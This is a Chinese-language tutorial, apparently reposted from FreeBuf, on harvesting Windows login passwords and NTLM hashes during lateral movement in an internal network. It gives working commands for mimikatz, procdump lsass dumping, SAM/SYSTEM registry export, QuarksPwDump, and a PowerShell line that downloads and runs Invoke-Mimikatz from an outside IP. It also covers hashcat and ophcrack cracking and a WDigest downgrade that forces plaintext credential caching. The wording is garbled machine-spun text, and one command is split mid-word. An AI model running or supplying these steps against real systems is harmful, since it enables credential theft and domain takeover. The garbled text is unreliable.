横着挪动中获得域内单机版登陆密码的方式

横着挪动中获得域内单机版登陆密码的方式

黑客资讯hacker2020-08-28 8:08:5993313A+A-

横着挪动

以内网渗入中,当网络攻击获得到内部网某台设备的决策权后,会以被攻占的服务器为起点、跳板,根据搜集域内凭据等各种各样方式 ,浏览域内别的设备,进一步扩张财产范畴。根据该类方式,网络攻击最后很有可能得到域控制器的访问限制,乃至良好控制根据Windows电脑操作系统的全部内部网自然环境,操纵域自然环境下的所有设备。

在内网渗透中,许多 横着挪动的方式 都必须网络攻击先获得域客户的登陆密码或是Hash值才可以开展,例如hach传送进攻、各种各样单据传送,也有金子单据保持管理权限这些。在本文中,大家先来解读一下横着挪动中获得域内单机版登陆密码的方式 ,下一篇文章再而言那几类进攻方式。因为最近一直在提前准备“蓝帽杯”得赛事,因此 一直没有时间升级,文章内容很有可能稍显匆忙,存在的不足还请多多指教。

文中专为想我一样已经新手入门的新手提前准备,巨头请经过!

Windows中的登陆密码

在Windows2000之后,Windows设备都用NTLM优化算法在当地储存客户的登陆密码,登陆密码的NTLMhach储存在%SystemRoot%\System32\config\SAM文档中。 Windows电脑操作系统一般应用二种方式 对客户的登陆密码开展hach解决,即 LAN Manager(LM)hach和 NT LAN Manager(NTLM)hach。说白了hach(Hash),即应用一种加密方法对弱密码开展数据加密,对一个随意长短的字符串数组数据信息开展一次数据加密计算,都能够回到一个固定不动长短的字符串数组。Windows数据加密过的登陆密码动态口令,大家称作Hash。

Windows电脑操作系统中的登陆密码一般由两一部分构成:一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的构造一般以下:

Username:RID:LM-Hash:NT-Hash

在windows2000之后的系统软件中,第一部分的 LM-hash 全是空值,由于LM-hash能够非常容易的破译,因此 windows2000以后这一值默认设置为空,因此 第二一部分的NTLM-hash才真实是客户登陆密码的hash值。

在网站渗透测试中,一般可从Windows系统软件中的SAM文档和域控的NTDS.dit文档(在域自然环境中,客户信息储存在NTDS.dit中)中得到全部客户的Hash。还可以根据Mimikatz载入lsass.exe过程得到已登陆客户的NTLM hash和密文值 。

敬请见:https://blog.csdn.net/qq_36119192/article/details/85941222

获得弱密码或登陆密码Hash

获得到Hash后,大家可以用破解工具来破译获得弱密码,还可以开展hach传送进攻(PTH)来横着渗入。

PwDump7专用工具

下载链接:https://www.openwall.com/passwords/windows-pwdump

Pwdump7能够在CMD下获取出系统软件中的客户的登陆密码hash (包含LM和NTLM),必须系统软件管理权限,“骨灰盒”级网络黑客游戏玩家很有可能听闻过这一小玩具。根据Pwdump7获取出的HASH,可以用ophcrack等专用工具破出弱密码,对进一步渗入是有非常大协助的。

专用工具应用非常简单,只需在cmd环境中运行Pwdump7程序流程,就可以获得当今系统软件中每个客户的登陆密码Hash (包含LM和NTLM):

Mimikatz专用工具

下载链接:https://github.com/gentilkiwi/mimikatz

Mimikatz是由美国人Benjamin开发设计的一款功能齐全的轻量调节专用工具,因功能齐全,可以立即载入Windows电脑操作系统的弱密码,因此出名于网站渗透测试行业。根据它你能提高过程管理权限引入过程载入过程运行内存,自然他较大的闪光点就是他能够立即从 lsass.exe 过程中获得当今登录系统登录名的登陆密码, lsass是微软公司Windows系统软件的安全性体制它关键用以当地安全性和登录对策,一般我们在登录系统软件时输入支付密码以后,登陆密码便会存储在lsass运行内存中,历经其 wdigest 和 tspkg 2个控制模块启用后,对其应用可逆性的优化算法开展数据加密并储存在运行内存当中, 而 mimikatz 更是根据对lsass逆算获得到弱密码!换句话说只要你不重启电脑,就可以根据他获得到用户名和密码,仅限当今登录系统软件!

注:可是在安裝了KB2871997补丁下载或是系统版本超过win10或windows server 2012时,默认设置在运行内存缓存文件中严禁储存弱密码,那样运用mimikatz就不可以从运行内存中读取弱密码了,但能够根据修改注册表的方法爬取密文。

Mimikatz载入弱密码和hash也时最常见的方式 。必须访问权限。

privilege::debug      // 提高至debug管理权限
sekurlsa::logonpasswords       // 爬取登陆密码

Procdump是微软官网公布的专用工具,因此 杀毒软件不容易阻拦,其能够用于将总体目标lsass文档导出来。下载链接:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

先用在总体目标设备提交微软公司的专用工具Procdump,导出来其lsass.exe:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

将在总体目标设备上导出来的lsass.dmp免费下载到当地后,实行mimikatz导出来lsass.dmp里边的登陆密码和hash:

sekurlsa::minidump 文件目录\lsass.dmp       // 将导出来的lsass.dmp加载到mimikatz中
sekurlsa::logonpasswords full                 // 获得登陆密码

根据SAM和System文档爬取登陆密码和Hash

先运用注册表命令将总体目标机的sam或system文档导出来,必须访问权限:

reg save hklm\sam sam.hive
reg save hklm\system system.hive

随后,将总体目标机里的sam.hive和system.hive免费下载到当地,运用mimikatz载入sam和system文档获得NTLM Hash:

lsadump::sam /sam:sam.hive /system:system.hive

还可以立即应用mimikatz载入当地SAM文档,得到登陆密码Hash:

privilege::debug
tok
en::elevate
lsadump::sam

Quarks PwDump专用工具

下载链接:https://github.com/quarkslab/quarkspwdump

Quarks PwDump 是一款对外开放源码的Windows客户凭证获取专用工具,它能够爬取windows服务平台下各种类型的客户凭证,包含:当地账号、域账号、缓存文件的域账号和Bitlocker。现阶段适用Windows XP/2003/Vista/7/8版本号,非常平稳。

应用必须访问权限:

QuarksPwDump.exe --dump-hash-local        // 导出来当地hash值
QuarksPwDump.exe -dhl

QuarksPwDump.exe -dhdc         // 导出来运行内存中的域控hash值
QuarksPwDump.exe --dump-hash-domain-cached

应用Powershell脚本制作

应用powershell脚本制作载入mimikatz控制模块获得登陆密码,该脚本制作坐落于powersploit后渗入架构中,下载链接:https://github.com/PowerShellMafia/PowerSploit

根据在总体目标机里远程管理实行该powershell脚本制作就可以获得登陆密码,必须访问权限。

powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/powersploit/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

powershell -exec bypass -c "& {Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCreds}"

Windows登陆密码hach破译方式

ophcrack在线破解

获得到登陆密码hash后,我们要对其开展破译,以获得弱密码。现如今在网上有很多的网址出示线上密码破解服务项目,在获得登陆密码hach后,能够对其开展在线破解。

网站地址:https://www.objectif-securite.ch/en/ophcrack

将获得的NTLM Hash键入到第一个查寻框中,点一下GO就可以开展破译,低于14位的登陆密码一般在数分钟内就可以破译进行:

ophcrack专用工具

ophcrack是一款Windows登陆密码hash值破解工具,其官方网让我们出示了几十GB的哈希表。

ophcrack下载链接:https://ophcrack.sourceforge.io/

ophcrack出示的彩虹表下载链接:https://ophcrack.sourceforge.io/tables.php

ophcrack应用十分简易,开启程序流程,点一下Load导进hash值,随后根据载入Tables后,实行Crack就可以开展破译:

ophcrack详细信息见:https://blog.csdn.net/m0_37438418/article/details/80157535

Hashcat工具

Hashcat称为是全世界更快的密码破解专用工具,全世界第一个和唯一一个根据GPGPU标准的模块。

Windows版下载链接:https://hashcat.net/hashcat/

linux版下载链接:https://github.com/hashcat/hashcat

免费下载出来以后,进到其源代码的文件目录实行“make && make install”指令就可以编译程序安裝。

实行“hashcat -h”进到协助网页页面:

(1)-m 特定hash值种类

例如大家常见的有

  • -m 1000:NTLM
  • -m 5600:Net-NTLMv2
  • -m 5500:NetNTLMv1 / NetNTLMv1 ESS
  • -m 0:MD5
  • -m 2500:WPA/PSK

大量hach种类请见官方网站:https://hashcat.net/wiki/doku.php?id=example_hashes

(2)-a 特定破译方式

  • -a 0:词典方式
  • -a 1:组合模式
  • -a 3:掩码暴力破解密码

rules文件目录下储放着转化成词典的各种各样标准,我们在当前目录下将基础信息储存在 base.txt文件中

将准备好的词典passwords.txt和必须破译的hash值文档hash.txt置放到hashcat所属文件目录下

./hashcat -m xx -a 0 <hashfile> <passwords.list1> <passwords.list2>
./hashcat -m 1000 -a 0 hash.txt -o result.txt passwords.txt
./hashcat -m 1000 -a 0 NTLM Hash passwords.txt

-a 0:特定以词典方式破译。

-m xx:特定hashfile文档里的hash值种类。

-o:把破译到的結果载入文档

<hashfile>:将好几个hash值存进文档,等候破译。

<passwords.list>:特定词典文档。

Hashcat的作用十分强劲,会干的时许多 ,大家自身去渐渐地探寻,开心的瞎折腾吧!

有关预防措施

微软公司为了更好地避免 客户的弱密码在运行内存中泄漏,公布了KB2871997补丁下载,关掉了Wdigest作用。Windows Server2012及之上版本号默认设置关掉Wdigest,使网络攻击没法从运行内存中获得弱密码。Windows Server2012下列版本号,假如安裝了KB2871997补丁下载,网络攻击一样没法获得弱密码。

在cmd自然环境打开或关掉Wdigest Auth,有以下二种方式 :

应用 red add命令

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f           // 打开Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f           // 关掉Wdigest Auth

进攻方式 :必须将UseLogonCredential的值设为1,随后销户当今客户,客户再度登陆后应用mimikatz就可以导出来密文动态口令。

Nishang中的Invoke-MimikatzWDigestDowngrade脚本制作集成化了这一作用,详细地址以下:

https://github.com/samratashok/nishang/blob/master/Gather/Invoke-MimikatzWDigestDowngrade.ps1

Ending......

这节,大家详细介绍了在内网渗透中获得域内单机版登陆密码和Hash的方式 ,获得到Hash后,我们可以应用专用工具开展工程爆破,得到弱密码,还可以用于hach传送、单据传送等方式 来对里网开展横着渗入,对内网渗透還是很有效的。

在下节中,大家将实际详尽的解读PTH、PTT等内部网横着挪动技巧。

参照:

https://www.cnblogs.com/-mo-/p/11890232.html

https://blog.csdn.net/m0_37438418/article/details/80157535

https://blog.csdn.net/tonghua6/article/details/45154317

https://yq.aliyun.com/articles/496300

《Sqlmap从入门到精通》

因为最近一直在提前准备“蓝帽杯”得赛事,因此 一直没有时间升级,文章内容很有可能稍显匆忙,存在的不足还请多多指教。

个人网站:https://whoamianony.top/

文中创作者:MrAnonymous, 转自FreeBuf

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 竹祭征棹2022-05-28 06:07:03
  • hcrack专用工具 ophcrack是一款Windows登陆密码hash值破解工具,其官方网让我们出示了几十GB的哈希表。 ophcrack下载链接:https://ophcrack.sourceforge.io/ ophcrack出
  • 寻妄绾痞2022-05-28 11:38:21
  • 97补丁下载,关掉了Wdigest作用。Windows Server2012及之上版本号默认设置关掉Wdigest,使网络攻击没法从运行内存中获得弱密码。Windows Server2012下列版本号,假如安裝了KB2871997补丁下载,网络攻击一样没法获得弱密码。
  • 寻妄苍阶2022-05-28 03:32:58
  • ');Invoke-Mimikatz -DumpCreds" powershell -exec bypass -c "& {Import-Module

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理